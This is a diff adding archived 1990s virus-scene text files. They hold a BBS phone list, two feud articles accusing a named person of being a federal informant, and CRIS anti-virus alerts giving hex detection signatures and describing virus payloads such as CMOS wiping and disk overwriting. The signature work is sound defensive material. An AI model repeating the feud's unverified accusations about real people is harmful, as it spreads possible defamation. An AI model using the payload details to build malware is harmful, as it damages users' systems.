++49-5373-2706 Mail Storage, Hillerse Germany VNT (9:491/6030)(2:240/520) ++49-6202-270420 News-box, Schwetzingen VNT (9:492/3560) ++49-6301-3622 The Database Warehouse, Kaiserslautern (2:247/110) ++49-6331-63207 Neuenfels - Box Pirmasens VNT (9:492/2570.0) (2:247/122) ++49-6422-7878 Golem, Kirchhain 1 (2:248/102) ++49-6898-76119 Super Mario Mailbox VIR (2:242/516) ++49-69-539806 The Summit BBS VIR (2:247/406) ++49-69-833076 Gilbert's Fundgrube - Offenbach/Main FRG (9:494/7060) ++49-721-370297 Virus Research Center Line II (2:241/7526) ++49-721-821355 Virus Help Service, Karlsruhe(Nemesis author) (2:241/7518) ++49-7541-74623 Bodensee bitbeisser Crew Friedrichshafen (2:241/7207) ++49-89-7005659 Advabced, A Schweigart, Munich VNT (9:494/3120)(2:246/119) ++49-89-8131695 Beta-System, Muenchen (2:246/10) ++49-9334-8175 Ed's BBS, Sulzdorf FRG (2:246/86) ++49-951-34659 Another Brick In The Wall! VIRINF (2:2400/304) ++52-83-564119 Creaturas de la Noche, Monterrey NL (4:971/1) ++61-2-4821716 Calmer Software TBSCAN/TBRESCUE/TBSCANX/Thunderbyte Card ++61-3-8885932 Melbourne Board: ComputerWare for Micros (3:681/871) ++61-7-2000660 Diagnostic BBS, Brisbane, Australia VIRINF (3:640/302) ++61-7-3991322 Power Up OZ VIRINF (3:640/215) ++61-7-8861886 The Edge of Reality! VIR C:CURE (3:640/886) ++66-2-2555981 Bangkok Security Associates Victor Charlie ++7-044-2689168 Fil Grushevsky, Ukraine VNT (9:744/101) (2:463/34) ++7-08535-98301 grdo@grdo.botik.yaroslavl.su, Pereslavl DOGSoft Ambulance ++81-3-36579255 The Watering Hole BBS, Tokyo VIRINF (6:730/18.0) ++852-789-1267 TAIC, gu_jc3@stu.ust.hk, Hong Kong (6:700/1) ++886-2-304-8901 Zen BBS, Taiwan VIR (6:720/312.0) ++886-7-5321444 Power Wave VIRINF (6:727/19) ++886-7-741-8038 New Taiwan Opus BBS VIR (6:727/2.0) ++90-1-2617628 RAN BBS, Istanbul Turkiye VIR (2:430/12) ++972-3-5490985 Wild Gun Excell/\/et VIRINF (2:403/156) ++972-3-9667562 Nemrod Kedem Rishon Le, Zion Israel (2:403/138) ++972-3-9673256 2400 MNP5 VNT (9:9721/0, 9:99/972) (2:403/138) ++972-3-9673499 14,400 V32b/V42b VNT (9:9721/101, 9:972/0) (2:403/138) ++972-3-9673919 14,400 V32b/V42b PC MC AT AM VIR (2:403/138) ++972-3-9674326 2400 V42b (2:403/138) ++972-3-9674339 Rudy's Place, Zion Israel (2:403/138) ++972-52-27271 Atari Blues BBS Israel (2:405/101.0) ++972-7-762291 Time Vortex VNT (9:9721/111) ++972-8-476549 Triple D BBS, Rehovot Israel (2:403/123) + +============== +Vancouver ROBERTS@decus.ca | "It says 'Hit any +Institute for Robert_Slade@sfu.ca | key to continue.' +Research into rslade@cue.bc.ca | I can't find the +User p1@CyberStore.ca | 'Any' key on my +Security Canada V7K 2G6 | keyboard." diff --git a/textfiles.com/virus/cnws2006.vir b/textfiles.com/virus/cnws2006.vir new file mode 100644 index 00000000..54e839d7 --- /dev/null +++ b/textfiles.com/virus/cnws2006.vir @@ -0,0 +1,149 @@ + + [ Echoes of Conspiracy ] + + By FireCracker + + + + + You have no idea how many times this week I have been asked "Is John +Buchanon a narc?" Well I cannot really say honestly yes or no to anyone who +has asked this question. The only thing I can offer the readers & friends is +the opportunity to see for themselves all the information and let each and +everyone decide for themselves what is truth and what is false. + + + +Round One: +---------- + + I have known Aristotle AKA John Buchanon for about 2 years now. I was +very much taken in by his social engineering skills and did not realize how +much he liked to have control over someone until he had backstabbed some of my +friends. In the beginning when I first started to talk to"Aristotle"(On my +dime!), my head was filled with "Do you know this person?..Well he/she is a +av'er and this person and this person and this person..etc etc etc" I stopped +calling him on a regular basis after I got tired of the political crap that +he kept on insisting on trying to drill in my head. I started talking to +him again in the summer of 93'. At this time period John was the NuKENET +USA HQ. Funny though I have never seen a HUB on a network have to have the +Network Moderator (RockSteady) poll him because he could not call out. +Our time on the phone was no differnt than before. He was a little upset +that NuKE had not done anything since VCL besides info journals. He wanted to +know if I wanted to help him start a group. I said sure why not. He said lets +use the name NuKE. I said huhu John that name is like taken remember. He said + "Who cares.. lets do it anyway" I said naww I think I' ll pass dude. I started +to think about this. Around this time period I had not received any mail from +the NuKENET in 23 DAYS! So I called John and asked him what was up.. Answers I got +were "..Not much going on the net right now" or "..Must be something wrong +between you and the bbs you are polling" So I called Rock Steady up and said +"SOMETHING AN'T RIGHT!, I want to poll the WHQ (Cybernetic Violence)" and +within an hour I was polling getting about 350k of messages I never had seen +come across the net. I called the board (one of Johns guru's) I was getting +feed from and told the sysop not to pack mail for me..I was getting it straight +from Canada. John called me within an hour of this and was extremly pissed, +and said that I was walking on his feet and screwing all his plans up. " I said +what plans are these John?" He told me that " I am going to kick Canada and +overseas out of the net and take it over." So I basically told him to get a +life and to screw off, which he did not like. I receieved alot of calls on my +voice number, after this, from Aristotle pawns like : + +Gene Paris AKA Jesus Slut Fucker ; Tells me he was going set my name up in the +National Crime Computer as being wanted for child molestation and he would +be laughing at me in jail. I am surprised that John actually associated him +self with someone who was a cocaine addict, was running around texas crash +bbs and made this a requirement to join his little terrorist group. Rumors +have pointed me as the indiviual who turned Gene in but this is an untruth. +Gene, like an idiot, tried to upload a virus to the NCC and received a phone +call after he got done that said, "We got you" and that was the end of Gene. +Question on my mind, did someone urge him on and then set him up? +Have fun in jail moron! + +A "Hacker" ; who tells me he has hacked Johns bbs and got my voice number from +John's "pretend" net where he had supposedly posted it. I still do not +know what the purpose of this call was. Who was this that called me John? + +Jackel ; This guy is TKO'ed no need to go in great details here! + +Round Two : +----------- + + In April of 1993, A friend of mine was calling differnt H/P/C/V/T/A/R/G/... + bbs's looking for viruses and came across some board that was into credit card +exchange. He looked around a bit and consequently saw his brothers credit info +posted up on this bbs. He asked the sysop to remove it and was told to FUCK OFF +. My friend said ok let's dance mr. sysop and called the United States Secret +Service about this bbs. There was supposed to be a meeting the following day. +He told his parents, myself, and John. Around 10:00 the day of the meeting, +my friend called me to tell me the Secret Service called his voice mail box and +left a message that said "We heard you told some people about our meeting and +we find this unacceptable, therefore we are cancelling our meeting" We were not +sure of the reason and knew who said something but did not know why. A year +later Aristotle told my friend that he was the one who called the secret +service because he wanted to "protect" him from anything bad happening to him. +When confronting Aristotle about this I was asked where did I receive this info +from, I refused to tell him but I did say that I was told about this incident +from two different parties. My question is still unanswered as of today. What +where you protecting him from John? + +Round Three: +------------ + +John and myself locked horns again in late March (1994). A fellow NuKE memeber +called and let me in on some real sweet information about Aristotle and the fact +that he might be an informant of some kind. John knew that something was up +and got on the horn with just about all of us to tell us that this information +should not be published. I probably spent about 5 hours total listening to +John explain that there were alot of crazy people in the world and that this +information might lead someone into think he was an informant/narc/whatever +and that they might come and hurt his family. I tried to explain to John that +the same thing had happen to me at the hands of one of his Disciples (Jackel) by him +realeasing "The HopperMainna Files" out on warez nets telling individuals I had +busted his Cousin Paris for phreaking and this is the number they should call to +fuck with me at work. I told John that all these WaReZ guru's had my info and +were told I was a narc but nothing happened, except everyone got a kick out of +listening to all mighty jackel talk on a speaker phone at work. I found that +trying to show John the close relationship with my example and his only +encouraged more screaming in my ear! I read over the information I received and +it is quite interesting and I really wish I could share it with you here but it +is not my information to share and I am sure when the owner wants it to be +released he will do so. + + +The lastest info +~~~~~~~~~~~~~~~~ + Well, I have to disagree with Screaming Radish in the fact that I do not +think he is on the top of John's shit list anymore because of a incident that +happened in early April. It seems that he is extremly pissed at the fact that +someone followed his butt to work one day and did some checking in on the every +day life of aristotle. He finally saw what it was like when someone pulled the +same info gathering childish shit on him. I was told on the phone by John +that he was going to come to my work and grab me from behind my desk and stomp +every fucking tooth out of my mouth. Unknownly at the time I was recording this +whole thing. I told John that the only reason that it was done to him was to +prove a harmless point that it is not fun when the tables are turned. + +So to answer the question... Is John a Fed? I would say no he is not a true fed +but someone who is looking for a goverment job and may leak information to +friends to try and boost his chances at an oppertunity. + + "So what FC, does it matter if John is turning in hackers? Do you say that you + are in support of the activity of people doing evil and mischevious things with +computers, telecommunications, credit, and electronic tresspassing?" + + ..No I am not one who condones this stuff nor do I think it is my duty to run +around cyberspace playing cybercop hunting down the mean and evil hackers of the +world. If people are doing something wrong they will get them ownselves in +trouble, unless they are good.. I do have a problem though with someone +running around playing cybernarc, setting people up, erging young minds on, then +turn around and report thier actions to thier local Sercret Service office. +Which I do believe to be the case here. I think Johns biggest problem is that +he was diagnosed with a learning disabilty at a post teen age and has strong +Narsassic tendancies with the erge to share it with us all. + + The next article you should read is one that was written by Mike Paris +[C.R.I.S.]. I found it to be very informative and answered some of the +unanswered question I had. + + FireCracker , [N u K E] + \ No newline at end of file diff --git a/textfiles.com/virus/cnws2007.vir b/textfiles.com/virus/cnws2007.vir new file mode 100644 index 00000000..bafadac4 --- /dev/null +++ b/textfiles.com/virus/cnws2007.vir @@ -0,0 +1,195 @@ + The Facts About Aristotle And His Friends + + Things I have Seen and heard + and + The things He Told Me. + + By: Michael Paris C.R.I.S + +First of all I do not agree in putting people down or slamming on +them. This information is not written as such, it is just to serve +those out there that want to know the facts and happenings in the +last year between C.R.I.S, Michael Paris, his friends and +Aristotle. + +First some simple facts about him. John and I at one time were +pretty close. I spent thousands of dollars on phone calls to him, +on an average I would say we used to talk at least every day for +about six months and as the bills were getting worse at least a +couple times a week. John always had his ideas and plans and a big +ego to go with them. If you are talking to him now you will +understand what I say quite well. + +He makes bold statements all the time and he makes it so you have +to agree with him. Everything he says is Gospel and you have to +agree with him or get a headache. I will go into some of these +claims later in this letter. If you know him or talk to him I urge +you to consider the contents of this information and pull out (just +disappear) while you can. + +You might say to your self that you know he is full of shit but you +are having fun right now, and you are in control. Do not be +deceived! Once he gets his claws into you it is hard to get away. +It is like joining a cult. It seems to me to be a slow brain +washing process. Be careful! + +Aristotle's Claims to C.R.I.S +------------------------------ + +When Cris first began to form and take shape we met John and began +to receive the NuKE echo's through him. We thought he was a cool +guy and invited him to join. It was not long before we saw that he +wanted to take Cris over, he started coming up with ideas and +dictating to us what we were going to do. This did not last very +long, but the fact is there that we stopped in our tracks and came +to reality of the direction we wanted to take. + +John still in the background tried his best to get other people +into 'his' little Cris group that he started naming "institutes of +virus research". We wanted no part of this or him at this time. +Our last talk on the topic was "where is the research" John had no +plans of research, it was just a name or title to get him farther +in his games, he never wanted to be legit in what he was doing. + +Now I have heard that he has told people that he started the group +Cris and I stole it from him! If you believe this you have a way +to come :) Do you think John would let anyone steal anything from +him? + +Everything good has to originate with him! He is the master, the +creator of all good things, but if you know him you know what I +mean. + +JOHN'S WILD CLAIMS +------------------- +Did you know John started Nuke? Nuke is his group, all in Nuke +follow him! NukeNet belongs to John as well. I got netmail and a +voice call from Nowhere Man telling me Him and Rock Steady wanted +me to cut people from the net. Well John was the "Boss" so I +called him to ask what to do. He said "Fuck Nowhere Man" "this is +my net" "who the fuck do they think they are?" "I'm Kicking there +asses out of the net" "don't listen to them" I just cut their +feed to the net, now lets see what they will do" Now I know where +he got the idea he started Cris :) + +Did you know that ALL viruses get uploaded to John (FIRST) before +any other VX board will get them John already had them. Did you +know that ALL the viruses out there on the other VX boards are from +John and that if it was not for him they would not have them? + +Did you know that John knows (everyone) that is somebody? (Both AV +and VX) + +Did you know that John is ahead of everyone? (smartest guy in the +world) + +Did you know that he knows ALL that is going on in (EVERY) group +and ALL info comes to him first? + +JOHN AND THE FEDS +----------------- + +Life was nice without talking to him for a while, how long could +this last? Not long at all. There was a friend of a friend down +here a while ago that I got a call on. The call was simple and +sweet, Tell him to stop what he is doing, or he is going to get +busted. I called his friend and his friend called him to warn him. + +Next comes a call from John. (Mr. Fed) Who gave you this info! +Someone's going to hang! "I will find out who leaked this +information!" "I will call the head of AT&T security and heads +will roll" "We will find out who did this" "It had to be someone +internal with connections". + +Why was John so upset with this? Well it turns out that this guy +was being used by both John and another (Known) Federal Agent to +get people connected to 800 conferences and get in good with them. +Funny thing was that John told me he was upset with Nuke and taking +it over because of their Nuke-Info #7, and all of the H/P/A stuff +in there, and now he has this kid calling me and two-waying the +call illegally so he does not have to pay for the call. + +I told him NEVER to call me in such a way again. I have a wife and +children, I do not need stuff like this coming back to me! + +From talking to this guy I find out that he is Phreaking all over +the country for John and his FED friend! I asked him if he was +crazy or what! The next thing you see is this guy organizing 800 +conferences getting very well known Phreakers on the line with John +and his FED friends. We figure that John was using him to get to +the others and make friends with them and get them busted. + +John told me that he hated people that were phreakers, why else +would he do it? And then John calls and is real mad that now he +wants to stop (because we warned him), Why? We helped ruin his +plans! + +ARSTOTLES BBS - A FED BOARD? +---------------------------- + +This is on tape + +Now we come to the time John took his board down and finally got a +job. But what kind of job? Ask him, I was real friendly with him +one day and he told me :) + +First John needed to get a security clearance for the job he has +now with the federal government. He ran into some problems with +this because he had dealings with some neo-nazi organization in +germany. (he sold the head of this organization his virus +collection) The feds had an investigation on this, they told John +that this was an international offence. it could be termed as +espionage. Selling weapons to the enemy. + +Could this be why his board is now according to John "sanctioned"? + +Yes John took his BBS down for about two weeks and then put it back +up again. He told me he would never put it back up, then he told +me that he told the feds that he took it down for good and would +not get back into viruses or BBS's or the like. Then John said +that they told him to put it back up. + +John told me that I was doing it all wrong, Here at Cris we tell +people where we are coming from, We are AVVX, John says, "you are +not going to get any more uploads" "you would not believe the stuff +I am into" "I am working with (AV persons name removed)" "we are +working on a government scanner" Yes John told me that he is in +constant meetings with AV/Government people and that his board is +sanctioned by the US Government, He told me that all of his info +and viruses are given over to them. + +JOHN / HOW CAN YOU TRUST HIM? +----------------------------- + +Not long ago there was someone that John was talking to, She was in +Virnet and passing Virnet and AV info to John. She never got +anything in return, she was just trying to be friends and help John +out. She bought his collection and even made friends with John's +wife. Then one day John decided he did not need her anymore so +what did he do? He called the head of this net and told on her, I +know this for a fact! John told me so. Also she ended up loosing +her job with a government company because (she said) John called he +work and told on her. Through their whole relationship she was +worried and asked John not to tell people who she was or what she +did. John promised never to tell anyone. + +John Gave me phone numbers and files that were never supposed to +get out. John gave me info one night (names, addresses, phone +numbers, etc on all that bought his collection and that were on his +bbs). He gave me Nuke members home personal phone numbers. + +John is now releasing personal info on all that he is mad at. + +The point here is are you going to be next? You keep feeding John +info on everyone he asks you to, and in between the breaths he is +writing down your info, taking screen captures, etc .. waiting for +the day he decides you are of no use any more. Or maybe he will get +you busted when he is through with you. Do not be deceived! This +is one dangerous man! + + +Watch You ASS! + +Michael Paris (C.R.I.S) + + diff --git a/textfiles.com/virus/cnws2008.vir b/textfiles.com/virus/cnws2008.vir new file mode 100644 index 00000000..6e760e04 --- /dev/null +++ b/textfiles.com/virus/cnws2008.vir @@ -0,0 +1,2116 @@ +-----BEGIN PGP SIGNED MESSAGE----- + + +For Complete Up Dated Sigfiles for TBAV or SCAN +Freq Magic Names CRISTBAV or CRISMCAF from 1:115/863 + +CRIS Virus Signature Alert! + +- ---------------------------------------------------------------------------- +Virus Name: South African Peace Virus + Notes: COM EXE INF + Signature: 5E 81 EE 06 01 E9 03 01 43 4F 4D 4D 41 4E + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +This is a direct overwriting file infector of .COM files to include +Command.com. Infected files will not longer run but you will get a +message on the screen. On 5 December of any year, it will attempt to +do two things. For systems using Dos 5.0+, it will turnoff access to +the C: drive. It will also attempt to delete a file called "chklist.ms" +in the current directory an infected file is run from. Cleanup is +simply replacing the infected files. Also, on 5 Dec, if the infected +file is run and the time in seconds is greater than 30, you will get +another message. Other than the one the original infection or infected +files gives. + +Bill Dirks + +Note: Infected files will be changed by 484 bytes, after all files +are infected the virus will write to itself now 777 bytes. The message +that will be displayed on the screen is "Let's Have Peace in S.A. From +OL' Jim Blue". The second message will get cut in the middle and not be +fully displayed. Infected files dates are changed to 00-17-90 + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: K-CMOS (Crypt Virus) + Notes: COM EXE INF + Signature: (TBAV) B9 CC 01 BB ?2 2E 81 07 ?2 83 C3 02 + (FPROT) B9 CC 01 BB ?? ?? 2E 81 07 ?? ?? 83 C3 02 + (SCAN) "B9CC01BB??2E8107??83C302" [K-CMOS] + +Virus Name: K-CMOS (first generation) + Notes: COM EXE DROP + Signature: BE 0D 01 2E 8A 84 94 03 2E 8C 84 B1 03 50 + + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected (infected files are missed) + SCAN V109 : No viruses found. (infected files see TridenT) + +If you add the above signature to your scanner, it will be detected. + +This virus will infect .EXE & .COM files. It will zero out +the stored drive values in CMOS on AT+ machines. However, it is a +little picky. Depending up on OS utilities loaded, it may cause an +immediate coldboot after zeroing the CMOS but failing to infect files. +Because the CMOS values are zeroed for the drive type, upon reboot, +it will look like no drive is present. This virus will attempt to walk +directories using the Path set in the environment to help determine +which files to infect. If you are in a directory not in the path +statement, it seems to foil it because I couldn't get it out of the +current directory. It looks at the timer only to get a random word for +use by the file/virus encryption routine. The timer isn't used for a +payload. This routine is fairly static and the virus can be found with +one wildcard string. As a marker to determine infected files, it sets +the seconds to 58 in the file date/time stamp. + +Bill Dirks + +Note: Infected files change in size 937 bytes. Each time an infected file +is run it will infect one .EXE and one .COM file in the current directory. +If it finds that there are no clean files to infect it will attempt to +infect files in other drives and directorys. This virus came out of the +Crypt Newsletter #20 (CRPTLT20.ZIP) + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: Blood Sugar + Notes: COM EXE INF + Signature: 5E 81 C6 1E 00 89 F3 81 EB 23 00 8A 27 8A + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +Blood Sugar is a non-resident .COM infector that infects all .COM files +in the current directory when an infected file is run. Infected files +will grow 416 bytes in size, and no change in file to date or time stamp. + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: Dementia Pracecox 1.0 + Notes: COM EXE INF + Signature: 5D 81 ED 12 01 8B F5 81 C6 38 01 8B DD 81 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +Dementia is a non-resident infector of .COM files that will change +infected files 512 bytes. Dementai will also infect all .COM files +in the current directory with no date or time changes made to +infected files. This virus was written by "Mnemonix". + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: Atomic 1.0 + Notes: EXE COM INF + Signature: B8 ED FE CD 21 A3 03 01 0E 8F 06 6F 01 BA + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +ATOMIC is a memory resident virus that spawns .COM files for .EXE files +in your directorys. After the virus is resident in your system memory it +will wait for you to run .EXE files. When a EXE file is run it will make +a matching .COM file with the same name. This will be a hidden file on +your disk. Spawned files will be 425 bytes in size until the file is run +on the 14th of any month when it will change in size to 456 bytes. The +increase in size comes from the virus adding a text string to any spawn +.COM file that is run on the 14th. Three spawn files will have the text +"Atomix v1.00 by Mnemonix." added to them if one file is run on that date. +The .COM spawn files will always result in the file date of creation or +infection. + +Michael Paris +- ---------------------------------------------------------------------------- + +For Complete Up Dated Sigfiles for TBAV or SCAN +Freq Magic Names CRISTBAV or CRISMCAF from 1:115/863 + + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTCwy6M4CDusTF+9AQFF+wIAoZUGMzIs+C52mO11hF74qrtZ4As44HUp +pNaePO1Z0cXEO5+h9PrFGB8NL1tbrXVgdG79YAPP4RlMTDM/oSTozA== +=PzOM +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S New Virus Signature Warning! CrisInfo #010 + +- ------------------------------------------------------------------------- +Virus Name: [CrisSig] CARPE + Notes: COM EXE INF + Signature: 8B F4 36 8B 2C 81 ED 03 01 44 44 8B C5 05 + + If you add the above signature to your scanner, it will be detected. + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +Thunderbytes heuristics are able to detect the dropper of this virus +but as soon as a file is infected, the virus encrypts itself and is +able to sneak pass Thunderbytes heuristics. + +CARPE DIEM! - Sieze the day originated from Sweden and was written by +Raver. Its a .COM infector and searches the directory tree downwards +using the dot-dot method. It checks the system time for one hundredth +of a second and if it matches, then it does an absolute write to the +first sector of the hard disk (boot sector of drive C:). There is about +a 5% chance of this happening and if it does, the following message will +also be displayed: + + CARPE DIEM! (c) '93 - Raver/Immortal Riot + +It also checks the current drive to see whether its drive A: or B: and +if so, it does not infect any files to avoid suspicion. +Infected files increase by 469 bytes and two clean .COM files are +infected every time the virus is run (unless the current drive is A: or B:) + +Carpe - This is a direct action virus. It will infect .Com files to +include Command.com. Files will show an increase of 472 bytes. It +checks the clock for hundredths of a second. If it is below 5, it +will overwrite the first sector of the HD with the virus code making +it unbootable and unrecognizable to the system. You will know when +this happens as a message will appear on the screen pronouncing the +presence of the virus. Infected files will continue to run. It also +uses the .. method to step backwards when no more files are available +in the current directory to infect. This virus originated in Sweden. + +- - Ashley Kleynhans - Bill Dirks [Cris] +- ------------------------------------------------------------------------- + +Virus Name: Human Greed + Notes: EXE COM OVW + Signature: BE 30 01 8B 16 17 01 B9 35 01 2E 31 14 83 + + F-Prot 2.11 : Possibly a new variant of Trivial. + TBAV 6.10 : Infected by V2pX virus. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +This is a mutation of the Infernal Demand virus written by Metal Militia. +It originated in Sweden and the author is The Unforgiven. +Its an overwriting virus that overwrites the first 666 bytes of EXE and +COM files. It checks the current drive and if it does not match with C:, +the virus automatically switches to C: drive if a C: drive exists so that +it can still do its damage. If an infected file is executed, there is a +50% chance of the message "Program too big to fit in memory" being +displayed (this is of course, a fake message which the virus displays). +If this happens, a random number is generated and if its less than 10, it +will proceed to overwrite the first couple of sectors on the C: drive, +this means that in total, you have a 5% chance of your C: drive being +overwritten every time the virus is run. It uses the dot dot method of +changing directory downwards once all files in the current directory are +overwritten. The virus does not infect floppies. + +H-Greed - This is a direct overwriting infector of Command.com and +all .EXE's. It renders infected programs useless since it overwrites. +It appears to do nothing other then replicate. However, if an infected +file is run and the clock shows a time with the hundredths less than 5, +it will overwrite the first 255 sectors of the HD. It uses the .. +method to step backwards when no more files are available in the +current directory to infect. This virus originated in Sweden. +- - Ashley Kleynhans - Bill Dirks [Cris] +- ------------------------------------------------------------------------- + +Virus Name: DOOM! + Notes: COM EXE INF + Signature: 8B FC 36 8B 2D 81 ED 03 01 44 44 1E 06 0E + +If you add the above signature to your scanner, it will be detected. + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Probably infected by an unknown virus. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +Thunderbytes heuristics detect the dropper of this virus, but fail to +detect the actual encrypted virus even when the heuristic parameter is +specified. + +DOOM! - originated from Sweden and was written by Raver. + +Its an .EXE infector and searches the directory tree downwards using the +dot-dot method, it does not stop travelling down the directory tree until +it has reached the root directory and infected all the .EXE files in the +root directory. It also chews up 3K of memory every time an infected file +is executed, there is a bug in this routine which causes the system to +freeze up when COMMAND.COM is called. Otherwise, this is a harmless virus. + +Ashley Kleynhans [CRiS] +- ------------------------------------------------------------------------- + +Virus Name: ETERNITY! + Notes: COM EXE INF + Signature: 5D 83 ED 03 E8 15 00 EB 27 90 E8 0F 00 B4 + +If you add the above signature to your scanner, it will be detected. + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +This virus originated from Sweden and was written by The Unforgiven. + +Thunderbytes heuristics will detect the dropper of the virus but as +soon as the virus appends itself to an .EXE file, it encrypts itself +and Thunderbyte is then unable to detect any infected files. + +Its a mutation of Tormentor's .EXE lession (so the author says). +It infects 3 .EXE files every time an infected file is executed and +uses the dot-dot method of travelling down the directory tree. +The size of infected files is increased by 562 bytes. + +Ashley Kleynhans [CRiS] +- ------------------------------------------------------------------------- + +[CrisSig] Geodesic Propagation 2.0 +EXE COM LOW INF +1E 06 0E 0E 1F 07 2E FE 06 ?2 2E A1 + + F-Prot 2.11 : Possibly a new variant of Nympho + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. + +Geodesic is A memory resident COM and EXE infector that will add 666 bytes +to infected files. There is no time or date changes, and files are infected +when they are run and the virus is resident in memory. +This virus was written by Cerebral Quantas [Phalcon/Skism] + +Michael Paris [Cris] +- ------------------------------------------------------------------------- + +Virus Name: OLO or OLO_II + Notes: EXE COM INF + Signature: 5D 81 ED 03 01 EB 1B 90 B8 24 35 CD 21 + + F-Prot 2.11 : New or modified variant of PS-MPC. + TBAV 6.10 : probably infected by an unknown virus. + SCAN V111 : Found virus -- Ancients [Anc] + +If you add the above signature to your scanner, it will be detected. + +OLO is a nonresident com infector. It will infect only the first com +file in the directory. When the file is first executed it will scroll across +the screen with the message "Ancient Sages Is on of the pAgEs". When this is +scrolling pressing Ctrl-Break will cause the scrolling to stop and the system +will make a sound almost like laughing. It will cause an infected file to +increase in size by 783 bytes. This virus will not check for previous +infection, so it therefore capable of reinfecing the same file over and over. +It appears to contain no intentionally damaging code. The following messages +are visible within the virus code: +"by -->>pAgE<<--(c) 1992 TuRN-THE-pAgE Ancient Sages Is one of the pAgEs" +"*.COM" + +OLO_II is also a nonresident com infector. It will also infect the first com +file in the directory. When the file is first executed it will scroll across +the screen with the message "Video Port XMS/EMS 1993". When the system is +scrolling pressing Ctrl-Break will cause the scrolling to stop and the system +will make a sound almost like laughing. It will cause infected files to +increase in size by 841 bytes. This virus will not check for previous +infection, so it is therefore capable of reinfecting the same file over and +over. It also appears to have a code problem. When a COM file is infected +the jump at the beginning of the COM file jumps to an INT 20 and ends +execution of both the COM file and the virus. +The following messages are visible within the virus code: +"byMicrosoft(c)MSD Memory Manager Beta Video Port XMS/EMS 1993" +"*.com" + +William Chapman (CRiS) +- ------------------------------------------------------------------------- + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLWV8BaM4CDusTF+9AQGgNgIAicVaTh+FnwkW9bBLJybCZXAGS46wyvc8 +1pyseIKnxQ9zPcWPZobZ8cd9dxsTIWbq0pgQPZfS/ULMvSF/i7NUDA== +=qY9e +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +Virus Signature Alert! + +Virus Name: [BENOIT] ICE-9 ARCV Variant + Notes: EXE COM INF LOW + Signature: 5E81EE06008D841F00508DBC1F00 + +Virus Name: [BENOIT] ICE-9 ARCV Variant Dropper + Notes: EXE COM INF + Signature: 33C0BB0001BE0001899CB2028984 + +[X] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +This virus is memory resident. No date or time changes take +place on infection. This virus comes from England and is a variant +of the ARCV virus. It was made November 5th 1992 and was Dedicated +to Benot B. Mandelbrot where the virus recieved it's name. F-prot +reports "Variant of ARCV" but no other scanner catches it in any way +yet. It is A .EXE infector though it can be found in .COM files as A +Dropper Program. This virus and its dropper can be detected with the +above signature added to your scanner. + +Virus Name: McAfee's Whale (MCWHALE) + Notes: COM EXE INF + Signature: BB2A02BE18002E81?346464B + +Virus Name: McAfee's Whale Dropper + Notes: COM EXE INF + Signature: BE000189F7C7041492C64402C756 + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +Both this virus and the drop program are not detected in any scanner I +have tried. This virus is not the stealth virus we are used to seeing. +This is A .EXE infector that adds 1125 bytes to infected files with no +date or time changes. When the infected file is run, A message moves +across the screen (from right to left) saying "BEWHERE!!! Anti-virus Man +John McAfee ... The WHALE Virus .... HONEST!!! .... +With the above signature added to scanner for the MCWHALE and the Dropper, +This virus is detectable. + + +Virus Name: [Chromosome Glitch] v3.0 Memory Lapse + Notes: COM EXE INF LOW + Signature: 5D81ED03011E06B8EFDDCD2181FB + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +This Virus Chromosome Glitch 3.0, Written by Memory Lapse in Toronto, ON. +is A memory resident .COM infector, adding 385 bytes to infected files. +Files are infected by running them after the virus becomes memory resident. +There are no date or time changes to the file. The virus will infect +command.com if the virus is already resident. No Scanners that were tested +detected this virus until the above signature was added. Memory Lapse is +a programmer in Canada that has written many viruses showing up here in the +USA. Most of them improving in the are of detection by AV scanners. The +latest that we have researched here were the Chromosome Glitch 1.0, 2.0, +Golgi Testicles] v1.0, 2.0, 3.0, Nympho Mitosis v1.0, 2.0, and the Famous +'Memory Lapse' Virus that is Un-Removeable from Nite Owls CD-ROM shareware +disk sent to many BBS's. This Virus Chromosome Glitch virus is detectable +by adding the above signature to your scanner. + + +Virus Name: Murphy (Goblin) Dropper + Notes: EXE COM INF LOW + Signature: BE26018BFE8B0E08018B160201B8 + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +All of the above scanners detect the virus above. BUT NOT the dropper for +the virus. Murphy's Goblin is A memory resident .EXE infector that does not +change dates or times on the files it infects. Some scanners scan the files +as 'Black Death'. The dropper for this virus is detectable by adding the +above signature to your scanner. + + +Virus Name: Blood Rage Virus + Notes: EXE COM INF + Signature: 5D81ED0301B844008EC0BF00018B + +[ ] F-Prot 2.09f 